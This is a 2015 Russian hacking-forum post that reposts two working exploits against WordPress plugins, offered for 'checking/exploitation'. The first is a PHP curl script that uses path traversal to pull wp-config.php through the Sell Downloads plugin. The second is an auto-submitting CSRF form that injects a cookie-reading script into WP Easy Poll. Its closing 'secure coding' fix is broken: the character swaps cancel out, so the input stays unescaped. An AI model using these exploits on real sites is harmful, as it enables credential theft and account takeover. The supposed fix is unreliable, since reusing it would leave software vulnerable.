1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Уязвимости wordpress 2015

Тема в разделе "Уязвимости популярных CMS", создана пользователем Хулиган, 12 дек 2015.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    Возможность получить данные с конфига, эксплоит для проверки/эксплуатации уязвимости:

    Wordpress plugin sell download v1.0.16 - local file disclosure.
    Код:
    ###########################################
    #-----------------------------------------#
    #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
    #-----------------------------------------#
    # *----------------------------* #
    # K |....##...##..####...####....| . #
    # h |....#...#........#..#...#...| A #
    # a |....#..#.........#..#....#..| N #
    # l |....###........##...#.....#.| S #
    # E |....#.#..........#..#....#..| e #
    # D |....#..#.........#..#...#...| u #
    # . |....##..##...####...####....| r #
    # *----------------------------* #
    #-----------------------------------------#
    #[ Copyright (c) 2015 | Dz Offenders Cr3w]#
    #-----------------------------------------#
    ###########################################
    # >> D_x . Made In Algeria . x_Z << #
    ###########################################
    #
    # [>] Title : Wordpress Plugin Sell Download v1.0.16 Local File Disclosure Vulnerability
    #
    # [>] Author : KedAns-Dz
    # [+] E-mail : ked-h (@hotmail.com)
    # [+] FaCeb0ok : fb.me/K3d.Dz
    # [+] TwiTter : @kedans
    #
    # [#] Platform : PHP / WebApp
    # [+] Cat/Tag : File Disclosure
    #
    # [<] <3 <3 Greetings t0 Palestine <3 <3
    # [!] Vendor : http://wordpress.dwbooster.com/content-tools/sell-downloads
    #
    ###########################################
    #
    # [!] Description :
    #
    # Wordpress plugin Sell Download v1.0.16 is suffer from Local File Disclosure Vulnerability
    # remote attacker can disclosure some local files.
    #
    ####
    
    <?php
    // page : sell-downloads.php
    // lines : 119, 130.. 131
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../../../../../../.././wp-config.php%00");
    curl_setopt($ch, CURLOPT_HTTPGET, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    $buf = curl_exec ($ch);
    curl_close($ch);
    unset($ch);
    echo $buf;
    ?>
    
    ####
    # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
    # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
    #---------------------------------------------------------------
    # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
    # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
    # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
    # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
    # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
    # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
    # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
    ####

    Wordpress plugin wp easy poll 1.1.3 - xss and csrf
    Код:
    Exploit Title: WP Easy Poll 1.1.3 XSS and CSRF
    Exploit Author : Ahn Sung Jun
    Date : 2015-12-09
    Vendor Homepage : https://wordpress.org/plugins/wp-easy-poll-afo/
    Software Link : https://downloads.wordpress.org/plugin/wp-easy-poll-afo.1.1.3.zip
    Version : 1.1.3
    Tested On : kail linux Iceweasel
    
    ===========================================
    Vulnerable Code : wp_easy_poll.php
    if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){
    global $wpdb;
    $pc = new poll_class;
    
    /* Line 859 */
    $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']);
    
    $wpdb->insert( $wpdb->prefix.$pc->table, $insert );
    $new_poll_id = $wpdb->insert_id;
    
    $p_anss = $_REQUEST['p_anss'];
    if(is_array($p_anss) and $new_poll_id){
    foreach($p_anss as $key => $value){
    if($value != ''){
    $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1);
    $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 );
    }
    }
    }
    
    ===========================================
    POC (XSS & CSRF)
    <html>
    <body onload="javascript:document.forms[0].submit()">
    <form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post">
    <input type="hidden" name="action" value="p_add" />
    <input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>">
    <input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" />
    <input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/>
    <input type="submit" name="submit" value="Submit" class="button" />
    </form>
    </html>
    
    ===========================================
    Secure Coding
    if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){
    global $wpdb;
    $pc = new poll_class;
    
    /* Secure Coding */
    $_REQUEST['p_ques'] = str_replace("script", "x-script", $_REQUEST['p_ques']);
    $_REQUEST['p_ques'] = str_replace("<", ">", $_REQUEST['p_ques']);
    $_REQUEST['p_ques']= str_replace(">" ,"<", $_REQUEST['p_ques']);
    
    $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']);
    
    $wpdb->insert( $wpdb->prefix.$pc->table, $insert );
    $new_poll_id = $wpdb->insert_id;
    
    $p_anss = $_REQUEST['p_anss'];
    if(is_array($p_anss) and $new_poll_id){
    foreach($p_anss as $key => $value){
    if($value != ''){
    $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1);
    $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 );
    }
    }
    }
     
    Последнее редактирование модератором: 12 дек 2015
    12 дек 2015
    v1nest нравится это.

Поделиться этой страницей

Загрузка...